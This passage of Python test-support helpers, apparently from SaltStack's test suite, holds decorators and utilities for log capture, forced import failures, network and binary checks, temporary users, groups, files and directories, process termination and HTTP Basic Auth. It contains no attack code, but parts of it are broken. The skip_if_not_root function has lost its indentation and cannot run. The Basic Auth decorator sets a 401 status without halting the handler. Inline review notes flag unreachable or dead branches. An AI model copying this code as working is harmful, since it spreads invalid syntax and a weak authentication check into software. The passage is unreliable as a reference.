        logging.root.addHandler(self.handler)
        self.activated = True
        # While capturing, force the root logger to its most verbose level,
        # remembering the previous one so it can be restored on deactivate()
        root_level = logging.root.getEffectiveLevel()
        if root_level > logging.DEBUG:
            self.prev_logging_level = root_level
            logging.root.setLevel(0)

    def deactivate(self):
        if not self.activated:
            return
        logging.root.removeHandler(self.handler)
        if self.prev_logging_level is not None:
            # Restore the root logging level we overrode in activate()
            logging.root.setLevel(self.prev_logging_level)

    @property
    def messages(self):
        return self.handler.messages if self.activated else []

    def clear(self):
        self.handler.messages = []

    def __enter__(self):
        self.activate()
        return self

    def __exit__(self, type, value, traceback):
        self.deactivate()
        self.activated = False

    # Mimic some handler attributes and methods
    @property
    def lock(self):
        if self.activated:
            return self.handler.lock

    def createLock(self):
        if self.activated:
            return self.handler.createLock()

    def acquire(self):
        if self.activated:
            return self.handler.acquire()

    def release(self):
        if self.activated:
            return self.handler.release()
def relative_import(import_name, relative_from='../'):
    '''
    Update sys.path to include `relative_from` before importing `import_name`
    '''
    try:
        return __import__(import_name)
    except ImportError:
        pass
    # The plain import failed; derive the calling module's directory and put
    # the requested relative path at the front of sys.path before retrying.
    caller_frame = inspect.getframeinfo(inspect.currentframe().f_back)
    caller_dir = os.path.abspath(os.path.dirname(caller_frame.filename))
    sys.path.insert(0, os.path.realpath(os.path.join(caller_dir, relative_from)))
    return __import__(import_name)
class ForceImportErrorOn(object):
    '''
    This class is meant to be used in mock'ed test cases which require an
    ``ImportError`` to be raised.
    >>> import os.path
    >>> with ForceImportErrorOn('os.path'):
    ...     import os.path
    ...
    Traceback (most recent call last):
      File "<stdin>", line 2, in <module>
      File "salttesting/helpers.py", line 263, in __import__
        'Forced ImportError raised for {0!r}'.format(name)
    ImportError: Forced ImportError raised for 'os.path'
    >>>
    >>> with ForceImportErrorOn(('os', 'path')):
    ...     import os.path
    ...     sys.modules.pop('os', None)
    ...     from os import path
    ...
    <module 'os' from '/usr/lib/python2.7/os.pyc'>
    Traceback (most recent call last):
      File "<stdin>", line 4, in <module>
      File "salttesting/helpers.py", line 288, in __fake_import__
        name, ', '.join(fromlist)
    ImportError: Forced ImportError raised for 'from os import path'
    >>>
    >>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
    ...     import os.path
    ...     sys.modules.pop('os', None)
    ...     from os import path
    ...
    Traceback (most recent call last):
      File "<stdin>", line 2, in <module>
      File "salttesting/helpers.py", line 281, in __fake_import__
        'Forced ImportError raised for {0!r}'.format(name)
    ImportError: Forced ImportError raised for 'os.path'
    >>>
    '''
    def __init__(self, *module_names):
        # Map of module name -> None (fail ANY import of that module) or a
        # set of attribute names (fail only ``from module import attr``).
        self.__module_names = {}
        for entry in module_names:
            if isinstance(entry, (list, tuple)):
                modname = entry[0]
                self.__module_names[modname] = set(entry[1:])
            else:
                self.__module_names[entry] = None
        # Keep a reference to the real import machinery so non-targeted
        # imports keep working while the patch is active.
        self.__original_import = builtins.__import__
        self.patcher = patch.object(builtins, '__import__', self.__fake_import__)

    def patch_import_function(self):
        # Replace builtins.__import__ with our failing stand-in
        self.patcher.start()

    def restore_import_funtion(self):
        # Put the real builtins.__import__ back in place
        self.patcher.stop()

    def __fake_import__(self,
                        name,
                        globals_={} if six.PY2 else None,
                        locals_={} if six.PY2 else None,
                        fromlist=[] if six.PY2 else (),
                        level=-1 if six.PY2 else 0):
        # The default argument values mirror the builtin __import__ defaults
        # of the running major Python version.
        if name in self.__module_names:
            importerror_fromlist = self.__module_names.get(name)
            if importerror_fromlist is None:
                # The whole module is blacklisted
                raise ImportError(
                    'Forced ImportError raised for {0!r}'.format(name)
                )
            if importerror_fromlist.intersection(set(fromlist)):
                # Only specific ``from module import name`` forms are blocked
                raise ImportError(
                    'Forced ImportError raised for {0!r}'.format(
                        'from {0} import {1}'.format(
                            name, ', '.join(fromlist)
                        )
                    )
                )
        # Not targeted: delegate to the real import machinery
        return self.__original_import(name, globals_, locals_, fromlist, level)

    def __enter__(self):
        self.patch_import_function()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.restore_import_funtion()
class MockWraps(object):
    '''
    Helper class to be used with the mock library.

    Pass an instance as the ``wraps`` keyword of ``Mock`` or ``MagicMock``
    to trigger a side effect for the first ``expected_failures`` calls and
    delegate to the original, un-mocked callable afterwards:

        >>> mw = MockWraps(original, 2, side_effect)
        >>> mw()   # side effect
        >>> mw()   # side effect
        >>> mw()   # original

    If ``side_effect`` is a plain function it is called; anything else is
    raised as an exception.
    '''

    def __init__(self, original, expected_failures, side_effect):
        self.__original = original
        self.__expected_failures = expected_failures
        self.__side_effect = side_effect
        self.__call_counter = 0

    def __call__(self, *args, **kwargs):
        attempt = self.__call_counter
        # Count this call no matter how it ends
        self.__call_counter = attempt + 1
        if attempt < self.__expected_failures:
            if isinstance(self.__side_effect, types.FunctionType):
                return self.__side_effect()
            raise self.__side_effect
        return self.__original(*args, **kwargs)
def requires_network(only_local_network=False):
    '''
    Simple decorator which is supposed to skip a test case in case there's no
    network connection to the internet.

    only_local_network
        When ``True`` only check that local sockets can be bound; do not
        probe the internet at all.
    '''
    def decorator(func):
        @functools.wraps(func)
        def wrapper(cls):
            has_local_network = False
            # First lets try if we have a local network. Inspired in
            # verify_socket
            try:
                # Bind two throw-away IPv4 sockets; success means the local
                # network stack is usable.
                pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                pubsock.bind(('', 18000))
                pubsock.close()
                retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                retsock.bind(('', 18001))
                retsock.close()
                has_local_network = True
            except socket.error:
                # I wonder if we just have IPV6 support?
                try:
                    pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
                    retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
                    pubsock.setsockopt(
                        socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
                    )
                    pubsock.bind(('', 18000))
                    pubsock.close()
                    retsock.setsockopt(
                        socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
                    )
                    retsock.bind(('', 18001))
                    retsock.close()
                    has_local_network = True
                except socket.error:
                    # Let's continue
                    pass
            if only_local_network is True:
                if has_local_network is False:
                    # Since we're only supposed to check local network, and no
                    # local network was detected, skip the test
                    cls.skipTest('No local network was detected')
                return func(cls)
            # We are using the google.com DNS records as numerical IPs to avoid
            # DNS lookups which could greatly slow down this check
            for addr in ('173.194.41.198', '173.194.41.199', '173.194.41.200',
                         '173.194.41.201', '173.194.41.206', '173.194.41.192',
                         '173.194.41.193', '173.194.41.194', '173.194.41.195',
                         '173.194.41.196', '173.194.41.197'):
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                try:
                    sock.settimeout(0.25)
                    sock.connect((addr, 80))
                    # We connected? Stop the loop
                    break
                except socket.error:
                    # Let's check the next IP
                    continue
                # NOTE(review): this ``else`` belongs to the try-statement and
                # only runs when the try-body completes without break/continue;
                # since the body always ends in ``break`` (or the except in
                # ``continue``), the skipTest below is unreachable -- the
                # "no internet" skip never actually fires. Confirm upstream.
                else:
                    cls.skipTest('No internet network connection was detected')
                finally:
                    sock.close()
            return func(cls)
        return wrapper
    return decorator
def with_system_user(username, on_existing='delete', delete=True, password=None, groups=None):
    '''
    Create and optionally destroy a system user to be used within a test
    case. The system user is created using the ``user`` salt module.
    The decorated testcase function must accept 'username' as an argument.

    :param username: The desired username for the system user.
    :param on_existing: What to do when the desired username is taken. The
                        available options are:
                        * nothing: Do nothing, act as if the user was created.
                        * delete: delete and re-create the existing user
                        * skip: skip the test case
    :param delete: Remove the user again after the test ran (default True).
    :param password: Password to set for the user (only used on Windows).
    :param groups: Groups to add the user to.
    '''
    if on_existing not in ('nothing', 'delete', 'skip'):
        raise RuntimeError(
            'The value of \'on_existing\' can only be one of, '
            '\'nothing\', \'delete\' and \'skip\''
        )
    if not isinstance(delete, bool):
        raise RuntimeError(
            'The value of \'delete\' can only be \'True\' or \'False\''
        )

    def decorator(func):
        @functools.wraps(func)
        def wrap(cls):
            # Let's add the user to the system.
            log.debug('Creating system user {0!r}'.format(username))
            kwargs = {'timeout': 60, 'groups': groups}
            if salt.utils.platform.is_windows():
                # user.add only understands a password on Windows
                kwargs.update({'password': password})
            create_user = cls.run_function('user.add', [username], **kwargs)
            if not create_user:
                log.debug('Failed to create system user')
                # The user was not created
                if on_existing == 'skip':
                    cls.skipTest(
                        'Failed to create system user {0!r}'.format(
                            username
                        )
                    )
                if on_existing == 'delete':
                    log.debug(
                        'Deleting the system user {0!r}'.format(
                            username
                        )
                    )
                    delete_user = cls.run_function(
                        'user.delete', [username, True, True]
                    )
                    if not delete_user:
                        cls.skipTest(
                            'A user named {0!r} already existed on the '
                            'system and re-creating it was not possible'
                            .format(username)
                        )
                    log.debug(
                        'Second time creating system user {0!r}'.format(
                            username
                        )
                    )
                    create_user = cls.run_function('user.add', [username], **kwargs)
                    if not create_user:
                        cls.skipTest(
                            'A user named {0!r} already existed, was deleted '
                            'as requested, but re-creating it was not possible'
                            .format(username)
                        )
            failure = None
            try:
                try:
                    return func(cls, username)
                except Exception as exc:  # pylint: disable=W0703
                    log.error(
                        'Running {0!r} raised an exception: {1}'.format(
                            func, exc
                        ),
                        exc_info=True
                    )
                    # Store the original exception details which will be raised
                    # a little further down the code
                    failure = sys.exc_info()
            finally:
                # Clean-up runs whether the test passed, failed or raised
                if delete:
                    delete_user = cls.run_function(
                        'user.delete', [username, True, True], timeout=60
                    )
                    if not delete_user:
                        if failure is None:
                            log.warning(
                                'Although the actual test-case did not fail, '
                                'deleting the created system user {0!r} '
                                'afterwards did.'.format(username)
                            )
                        else:
                            log.warning(
                                'The test-case failed and also did the removal'
                                ' of the system user {0!r}'.format(username)
                            )
                if failure is not None:
                    # If an exception was thrown, raise it
                    six.reraise(failure[0], failure[1], failure[2])
        return wrap
    return decorator
def with_system_group(group, on_existing='delete', delete=True):
    '''
    Create and optionally destroy a system group to be used within a test
    case. The system group is created using the ``group`` salt module.
    The decorated testcase function must accept 'group' as an argument.

    :param group: The desired group name for the system group.
    :param on_existing: What to do when the desired group name is taken. The
                        available options are:
                        * nothing: Do nothing, act as if the group was created
                        * delete: delete and re-create the existing group
                        * skip: skip the test case
    :param delete: Remove the group again after the test ran (default True).
    '''
    if on_existing not in ('nothing', 'delete', 'skip'):
        raise RuntimeError(
            'The value of \'on_existing\' can only be one of, '
            '\'nothing\', \'delete\' and \'skip\''
        )
    if not isinstance(delete, bool):
        raise RuntimeError(
            'The value of \'delete\' can only be \'True\' or \'False\''
        )

    def decorator(func):
        @functools.wraps(func)
        def wrap(cls):
            # Let's add the user to the system.
            log.debug('Creating system group {0!r}'.format(group))
            create_group = cls.run_function('group.add', [group])
            if not create_group:
                log.debug('Failed to create system group')
                # The group was not created
                if on_existing == 'skip':
                    cls.skipTest(
                        'Failed to create system group {0!r}'.format(group)
                    )
                if on_existing == 'delete':
                    log.debug(
                        'Deleting the system group {0!r}'.format(group)
                    )
                    delete_group = cls.run_function('group.delete', [group])
                    if not delete_group:
                        cls.skipTest(
                            'A group named {0!r} already existed on the '
                            'system and re-creating it was not possible'
                            .format(group)
                        )
                    log.debug(
                        'Second time creating system group {0!r}'.format(
                            group
                        )
                    )
                    create_group = cls.run_function('group.add', [group])
                    if not create_group:
                        cls.skipTest(
                            'A group named {0!r} already existed, was deleted '
                            'as requested, but re-creating it was not possible'
                            .format(group)
                        )
            failure = None
            try:
                try:
                    return func(cls, group)
                except Exception as exc:  # pylint: disable=W0703
                    log.error(
                        'Running {0!r} raised an exception: {1}'.format(
                            func, exc
                        ),
                        exc_info=True
                    )
                    # Store the original exception details which will be raised
                    # a little further down the code
                    failure = sys.exc_info()
            finally:
                # Clean-up runs whether the test passed, failed or raised
                if delete:
                    delete_group = cls.run_function('group.delete', [group])
                    if not delete_group:
                        if failure is None:
                            log.warning(
                                'Although the actual test-case did not fail, '
                                'deleting the created system group {0!r} '
                                'afterwards did.'.format(group)
                            )
                        else:
                            log.warning(
                                'The test-case failed and also did the removal'
                                ' of the system group {0!r}'.format(group)
                            )
                if failure is not None:
                    # If an exception was thrown, raise it
                    six.reraise(failure[0], failure[1], failure[2])
        return wrap
    return decorator
def with_system_user_and_group(username, group,
                               on_existing='delete', delete=True):
    '''
    Create and optionally destroy a system user and group to be used within a
    test case. The system user is created using the ``user`` salt module, and
    the system group is created with the ``group`` salt module.
    The decorated testcase function must accept both the 'username' and 'group'
    arguments.

    :param username: The desired username for the system user.
    :param group: The desired name for the system group.
    :param on_existing: What to do when the desired username is taken. The
                        available options are:
                        * nothing: Do nothing, act as if the user was created.
                        * delete: delete and re-create the existing user
                        * skip: skip the test case
    :param delete: Remove user and group again after the test (default True).
    '''
    if on_existing not in ('nothing', 'delete', 'skip'):
        raise RuntimeError(
            'The value of \'on_existing\' can only be one of, '
            '\'nothing\', \'delete\' and \'skip\''
        )
    if not isinstance(delete, bool):
        raise RuntimeError(
            'The value of \'delete\' can only be \'True\' or \'False\''
        )

    def decorator(func):
        @functools.wraps(func)
        def wrap(cls):
            # Let's add the user to the system.
            log.debug('Creating system user {0!r}'.format(username))
            create_user = cls.run_function('user.add', [username])
            log.debug('Creating system group {0!r}'.format(group))
            create_group = cls.run_function('group.add', [group])
            if not create_user:
                log.debug('Failed to create system user')
                # The user was not created
                if on_existing == 'skip':
                    cls.skipTest(
                        'Failed to create system user {0!r}'.format(
                            username
                        )
                    )
                if on_existing == 'delete':
                    log.debug(
                        'Deleting the system user {0!r}'.format(
                            username
                        )
                    )
                    delete_user = cls.run_function(
                        'user.delete', [username, True, True]
                    )
                    if not delete_user:
                        cls.skipTest(
                            'A user named {0!r} already existed on the '
                            'system and re-creating it was not possible'
                            .format(username)
                        )
                    log.debug(
                        'Second time creating system user {0!r}'.format(
                            username
                        )
                    )
                    create_user = cls.run_function('user.add', [username])
                    if not create_user:
                        cls.skipTest(
                            'A user named {0!r} already existed, was deleted '
                            'as requested, but re-creating it was not possible'
                            .format(username)
                        )
            if not create_group:
                log.debug('Failed to create system group')
                # The group was not created
                if on_existing == 'skip':
                    cls.skipTest(
                        'Failed to create system group {0!r}'.format(group)
                    )
                if on_existing == 'delete':
                    log.debug(
                        'Deleting the system group {0!r}'.format(group)
                    )
                    delete_group = cls.run_function('group.delete', [group])
                    if not delete_group:
                        cls.skipTest(
                            'A group named {0!r} already existed on the '
                            'system and re-creating it was not possible'
                            .format(group)
                        )
                    log.debug(
                        'Second time creating system group {0!r}'.format(
                            group
                        )
                    )
                    create_group = cls.run_function('group.add', [group])
                    if not create_group:
                        cls.skipTest(
                            'A group named {0!r} already existed, was deleted '
                            'as requested, but re-creating it was not possible'
                            .format(group)
                        )
            failure = None
            try:
                try:
                    return func(cls, username, group)
                except Exception as exc:  # pylint: disable=W0703
                    log.error(
                        'Running {0!r} raised an exception: {1}'.format(
                            func, exc
                        ),
                        exc_info=True
                    )
                    # Store the original exception details which will be raised
                    # a little further down the code
                    failure = sys.exc_info()
            finally:
                # Clean-up runs whether the test passed, failed or raised
                if delete:
                    delete_user = cls.run_function(
                        'user.delete', [username, True, True]
                    )
                    delete_group = cls.run_function('group.delete', [group])
                    if not delete_user:
                        if failure is None:
                            log.warning(
                                'Although the actual test-case did not fail, '
                                'deleting the created system user {0!r} '
                                'afterwards did.'.format(username)
                            )
                        else:
                            log.warning(
                                'The test-case failed and also did the removal'
                                ' of the system user {0!r}'.format(username)
                            )
                    if not delete_group:
                        if failure is None:
                            log.warning(
                                'Although the actual test-case did not fail, '
                                'deleting the created system group {0!r} '
                                'afterwards did.'.format(group)
                            )
                        else:
                            log.warning(
                                'The test-case failed and also did the removal'
                                ' of the system group {0!r}'.format(group)
                            )
                if failure is not None:
                    # If an exception was thrown, raise it
                    six.reraise(failure[0], failure[1], failure[2])
        return wrap
    return decorator
class WithTempfile(object):
    '''Decorator that hands the wrapped test a temporary file path.

    The file is created before the test runs (unless ``create=False``, in
    which case only a fresh unused path is passed) and removed afterwards.
    Remaining keyword arguments are forwarded to ``salt.utils.files.mkstemp``.
    '''

    def __init__(self, **kwargs):
        self.create = kwargs.pop('create', True)
        if 'dir' not in kwargs:
            kwargs['dir'] = TMP
        if 'prefix' not in kwargs:
            kwargs['prefix'] = '__salt.test.'
        self.kwargs = kwargs

    def __call__(self, func):
        self.func = func

        @functools.wraps(func)
        def wrapper(testcase, *args, **kwargs):
            return self.wrap(testcase, *args, **kwargs)
        return wrapper

    def wrap(self, testcase, *args, **kwargs):
        name = salt.utils.files.mkstemp(**self.kwargs)
        if not self.create:
            # Only a fresh, unused path was requested
            os.remove(name)
        try:
            return self.func(testcase, name, *args, **kwargs)
        finally:
            # Best-effort cleanup; the test itself may already have removed it
            try:
                os.remove(name)
            except OSError:
                pass


with_tempfile = WithTempfile
class WithTempdir(object):
    '''Decorator that hands the wrapped test a temporary directory.

    The directory is created before the test runs (unless ``create=False``,
    in which case only a fresh unused path is passed) and removed afterwards.
    Remaining keyword arguments are forwarded to ``tempfile.mkdtemp``.
    '''

    def __init__(self, **kwargs):
        self.create = kwargs.pop('create', True)
        if 'dir' not in kwargs:
            kwargs['dir'] = TMP
        self.kwargs = kwargs

    def __call__(self, func):
        self.func = func

        @functools.wraps(func)
        def wrapper(testcase, *args, **kwargs):
            return self.wrap(testcase, *args, **kwargs)
        return wrapper

    def wrap(self, testcase, *args, **kwargs):
        tempdir = tempfile.mkdtemp(**self.kwargs)
        if not self.create:
            # Only a fresh, unused path was requested
            os.rmdir(tempdir)
        try:
            return self.func(testcase, tempdir, *args, **kwargs)
        finally:
            shutil.rmtree(tempdir, ignore_errors=True)


with_tempdir = WithTempdir
def requires_system_grains(func):
    '''
    Function decorator which loads and passes the system's grains to the test
    case.
    '''
    @functools.wraps(func)
    def wrapper(cls):
        # The test case must expose ``run_function`` so we can ask the
        # minion for its grains.
        if not hasattr(cls, 'run_function'):
            raise RuntimeError(
                '{0} does not have the \'run_function\' method which is '
                'necessary to collect the system grains'.format(
                    cls.__class__.__name__
                )
            )
        grains = cls.run_function('grains.items')
        return func(cls, grains=grains)
    return wrapper
def requires_salt_modules(*names):
    '''
    Makes sure the passed salt module is available. Skips the test if not

    .. versionadded:: 0.5.2
    '''
    def decorator(caller):
        if inspect.isclass(caller):
            # We're decorating a class
            old_setup = getattr(caller, 'setUp', None)

            def setUp(self, *args, **kwargs):
                # Run any pre-existing setUp first, then check availability
                if old_setup is not None:
                    old_setup(self, *args, **kwargs)
                if not hasattr(self, 'run_function'):
                    raise RuntimeError(
                        '{0} does not have the \'run_function\' method which '
                        'is necessary to collect the loaded modules'.format(
                            self.__class__.__name__
                        )
                    )
                # Ask the minion which of the requested modules are missing
                not_found_modules = self.run_function('runtests_helpers.modules_available', names)
                if not_found_modules:
                    if len(not_found_modules) == 1:
                        self.skipTest('Salt module {0!r} is not available'.format(not_found_modules[0]))
                    self.skipTest('Salt modules not available: {0!r}'.format(not_found_modules))
            caller.setUp = setUp
            return caller

        # We're simply decorating functions
        @functools.wraps(caller)
        def wrapper(cls):
            if not hasattr(cls, 'run_function'):
                raise RuntimeError(
                    '{0} does not have the \'run_function\' method which is '
                    'necessary to collect the loaded modules'.format(
                        cls.__class__.__name__
                    )
                )
            # Probe each module through sys.doc; skip on the first missing one
            for name in names:
                if name not in cls.run_function('sys.doc', [name]):
                    cls.skipTest(
                        'Salt module {0!r} is not available'.format(name)
                    )
                    break
            return caller(cls)
        return wrapper
    return decorator
def skip_if_binaries_missing(*binaries, **kwargs):
    '''
    Skip the decorated test when the given binaries are not found on PATH.

    check_all
        When ``True`` every binary must be present; otherwise one is enough.
    message
        Optional prefix for the skip reason.
    '''
    import salt.utils.path

    # A single list/tuple/set argument is treated as the list of binaries
    if len(binaries) == 1 and isinstance(binaries[0], (list, tuple, set, frozenset)):
        binaries = binaries[0]
    check_all = kwargs.pop('check_all', False)
    message = kwargs.pop('message', None)
    if kwargs:
        raise RuntimeError(
            'The only supported keyword argument is \'check_all\' and '
            '\'message\'. Invalid keyword arguments: {0}'.format(
                ', '.join(kwargs.keys())
            )
        )
    prefix = '{0}. '.format(message) if message else ''
    if check_all:
        # Every requested binary must resolve
        for binary in binaries:
            if salt.utils.path.which(binary) is None:
                return skip(
                    '{0}The {1!r} binary was not found'.format(prefix, binary)
                )
    elif salt.utils.path.which_bin(binaries) is None:
        # At least one of the requested binaries must resolve
        return skip(
            '{0}None of the following binaries was found: {1}'.format(
                prefix, ', '.join(binaries)
            )
        )
    # Everything needed is available; decorate with the identity function
    return _id
def skip_if_not_root(func):
if not sys.platform.startswith('win'):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = 'You must be logged in as root to run this test'
else:
current_user = salt.utils.win_functions.get_current_user()
if current_user != 'SYSTEM':
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = 'You must be logged in as an Administrator to run this test'
return func
# Signal used throughout this module to politely stop a process.
# NOTE: Windows cannot deliver SIGTERM to other processes, so
# CTRL_BREAK_EVENT is used as the closest stand-in there.
if sys.platform.startswith('win'):
    SIGTERM = signal.CTRL_BREAK_EVENT  # pylint: disable=no-member
else:
    SIGTERM = signal.SIGTERM
def collect_child_processes(pid):
    '''
    Try to collect any started child processes of the provided pid
    '''
    children = []
    # Let's get the child processes of the started subprocess
    try:
        parent = psutil.Process(pid)
        # Very old psutil releases may not expose ``children``
        if hasattr(parent, 'children'):
            children = parent.children(recursive=True)
    except psutil.NoSuchProcess:
        pass
    return children[::-1]  # return a reversed list of the children
def _terminate_process_list(process_list, kill=False, slow_stop=False):
    # Single termination pass used by terminate_process_list(); mutates
    # ``process_list`` in place, removing entries confirmed gone.
    # kill: use process.kill() instead of a termination signal.
    # slow_stop: send SIGTERM and briefly wait so the process can shut
    # down cleanly (e.g. flush coverage data).
    for process in process_list[:][::-1]:  # Iterate over a reversed copy of the list
        if not psutil.pid_exists(process.pid):
            process_list.remove(process)
            continue
        try:
            if not kill and process.status() == psutil.STATUS_ZOMBIE:
                # Zombie processes will exit once child processes also exit
                continue
            try:
                cmdline = process.cmdline()
            except psutil.AccessDenied:
                # OSX is more restrictive about the above information
                cmdline = None
            if not cmdline:
                try:
                    cmdline = process.as_dict()
                except Exception:
                    cmdline = 'UNKNOWN PROCESS'
            if kill:
                log.info('Killing process(%s): %s', process.pid, cmdline)
                process.kill()
            else:
                log.info('Terminating process(%s): %s', process.pid, cmdline)
                try:
                    if slow_stop:
                        # Allow coverage data to be written down to disk
                        process.send_signal(SIGTERM)
                        try:
                            process.wait(2)
                        except psutil.TimeoutExpired:
                            # Still running after the grace period; leave it
                            # in the list so a later, harsher pass gets it
                            if psutil.pid_exists(process.pid):
                                continue
                    else:
                        process.terminate()
                except OSError as exc:
                    # ESRCH: already gone; EACCES: not ours to signal
                    if exc.errno not in (errno.ESRCH, errno.EACCES):
                        raise
            if not psutil.pid_exists(process.pid):
                process_list.remove(process)
        except psutil.NoSuchProcess:
            process_list.remove(process)
def terminate_process_list(process_list, kill=False, slow_stop=False):
    '''
    Terminate every psutil process in ``process_list``, escalating over up
    to three passes until everything is gone. The list is mutated in place;
    entries still present afterwards failed to terminate.
    '''
    def on_process_terminated(proc):
        log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)

    # Try to terminate processes with the provided kill and slow_stop parameters
    log.info('Terminating process list. 1st step. kill: %s, slow stop: %s', kill, slow_stop)

    # Cache the cmdline since that will be inaccessible once the process is terminated
    for proc in process_list:
        try:
            cmdline = proc.cmdline()
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            # OSX is more restrictive about the above information
            cmdline = None
        if not cmdline:
            try:
                # NOTE(review): this assignment cannot raise, so the except
                # below is dead; the fallback looks intended for a psutil
                # call such as proc.as_dict() -- confirm against upstream.
                cmdline = proc
            except (psutil.NoSuchProcess, psutil.AccessDenied):
                cmdline = '<could not be retrived; dead process: {0}>'.format(proc)
        proc._cmdline = cmdline
    _terminate_process_list(process_list, kill=kill, slow_stop=slow_stop)
    psutil.wait_procs(process_list, timeout=15, callback=on_process_terminated)
    if process_list:
        # If there's still processes to be terminated, retry and kill them if slow_stop is False
        log.info('Terminating process list. 2nd step. kill: %s, slow stop: %s', slow_stop is False, slow_stop)
        _terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
        psutil.wait_procs(process_list, timeout=10, callback=on_process_terminated)
    if process_list:
        # If there's still processes to be terminated, just kill them, no slow stopping now
        log.info('Terminating process list. 3rd step. kill: True, slow stop: False')
        _terminate_process_list(process_list, kill=True, slow_stop=False)
        psutil.wait_procs(process_list, timeout=5, callback=on_process_terminated)
    if process_list:
        # In there's still processes to be terminated, log a warning about it
        log.warning('Some processes failed to properly terminate: %s', process_list)
def terminate_process(pid=None, process=None, children=None, kill_children=False, slow_stop=False):
    '''
    Try to terminate/kill the started process.

    pid
        PID of the process to terminate; looked up when ``process`` is not
        provided.
    process
        An existing ``psutil.Process`` instance to terminate.
    children
        Previously collected child processes to terminate as well.
    kill_children
        Also terminate the process' children; collected automatically when
        not provided.
    slow_stop
        Send a termination signal first and give the processes a chance to
        shut down cleanly before escalating to kill.
    '''
    # NOTE: the previous revision defined an on_process_terminated() callback
    # here that was never passed to any wait call (terminate_process_list
    # defines its own); it was dead code and has been removed.
    children = children or []
    process_list = []

    if pid and not process:
        try:
            process = psutil.Process(pid)
            process_list.append(process)
        except psutil.NoSuchProcess:
            # Process is already gone
            process = None

    if kill_children:
        if process:
            if not children:
                children = collect_child_processes(process.pid)
            else:
                # Let's collect children again since there might be new ones
                children.extend(collect_child_processes(pid))
        if children:
            process_list.extend(children)

    if process_list:
        if process:
            log.info('Stopping process %s and respective children: %s', process, children)
        else:
            log.info('Terminating process list: %s', process_list)
        terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
        if process and psutil.pid_exists(process.pid):
            log.warning('Process left behind which we were unable to kill: %s', process)
def terminate_process_pid(pid, only_children=False):
    '''
    Terminate the process with the given PID (and its children); when
    ``only_children`` is true, leave the process itself alone.
    '''
    process = None
    children = []

    # Look the process up first so its children can be addressed as well
    try:
        process = psutil.Process(pid)
        children = collect_child_processes(pid)
    except psutil.NoSuchProcess:
        log.info('No process with the PID %s was found running', pid)

    if only_children:
        return terminate_process(children=children, kill_children=True, slow_stop=True)
    return terminate_process(pid=pid, process=process, children=children, kill_children=True, slow_stop=True)
def repeat(caller=None, condition=True, times=5):
    '''
    Repeat a test X amount of times until the first failure.

    .. code-block:: python

        class MyTestCase(TestCase):

            @repeat
            def test_sometimes_works(self):
                pass

    caller
        The test function or test class being decorated (filled in
        automatically when used as a bare ``@repeat``).
    condition
        When ``False`` (or a callable returning ``False``) do not decorate
        at all and return ``caller`` unchanged.
    times
        How many times to run the test.
    '''
    if caller is None:
        # Called as ``@repeat(...)`` with arguments; return the real decorator
        return functools.partial(repeat, condition=condition, times=times)
    if isinstance(condition, bool) and condition is False:
        # Don't even decorate
        return caller
    elif callable(condition):
        if condition() is False:
            # Don't even decorate
            return caller
    if inspect.isclass(caller):
        # Decorating a class: recursively decorate every test_* method
        attrs = [n for n in dir(caller) if n.startswith('test_')]
        for attrname in attrs:
            try:
                function = getattr(caller, attrname)
                if not inspect.isfunction(function) and not inspect.ismethod(function):
                    continue
                setattr(caller, attrname, repeat(caller=function, condition=condition, times=times))
            except Exception as exc:  # pylint: disable=broad-except
                log.exception(exc)
                continue
        return caller

    @functools.wraps(caller)
    def wrap(cls):
        # Run the test ``times`` times; the first failure propagates.
        # (An unused ``result`` local was removed here.)
        for attempt in range(1, times + 1):
            log.info('%s test run %d of %s times', cls, attempt, times)
            caller(cls)
        return cls
    return wrap
def http_basic_auth(login_cb=lambda username, password: False):
    '''
    A crude decorator to force a handler to request HTTP Basic Authentication

    login_cb
        Callable receiving ``(username, password)`` and returning ``True``
        when the credentials are valid.

    Example usage:
    .. code-block:: python
        @http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
        class AuthenticatedHandler(tornado.web.RequestHandler):
            pass
    '''
    def wrapper(handler_class):
        def wrap_execute(handler_execute):
            def check_auth(handler, kwargs):
                auth = handler.request.headers.get('Authorization')
                if auth is None or not auth.startswith('Basic '):
                    # No username/password entered yet, we need to return a 401
                    # and set the WWW-Authenticate header to request login.
                    handler.set_status(401)
                    handler.set_header(
                        'WWW-Authenticate', 'Basic realm=Restricted')
                else:
                    # Strip the 'Basic ' from the beginning of the auth header
                    # leaving the base64-encoded secret.
                    # b64decode() returns bytes on Python 3, so decode to text
                    # before splitting -- bytes.split(':') raises a TypeError.
                    username, password = \
                        base64.b64decode(auth[6:]).decode('utf-8').split(':', 1)
                    if login_cb(username, password):
                        # Authentication successful
                        return
                    else:
                        # Authentication failed
                        handler.set_status(403)
                        handler._transforms = []
                        handler.finish()

            def _execute(self, transforms, *args, **kwargs):
                check_auth(self, kwargs)
                return handler_execute(self, transforms, *args, **kwargs)
            return _execute

        handler_class._execute = wrap_execute(handler_class._execute)
        return handler_class
    return wrapper
def generate_random_name(prefix, size=6):
    '''
    Generates a random name by combining the provided prefix with a randomly
    generated ascii string.

    .. versionadded:: 2018.3.0

    prefix
        The string to prefix onto the randomly generated ascii string.
    size
        The number of characters to generate. Default: 6.
    '''
    alphabet = string.ascii_uppercase + string.digits
    suffix = ''.join(random.choice(alphabet) for _ in range(size))
    return prefix + suffix
class Webserver(object):
    '''
    Starts a tornado webserver on 127.0.0.1 on a random available port

    USAGE:
    .. code-block:: python
        from tests.support.helpers import Webserver
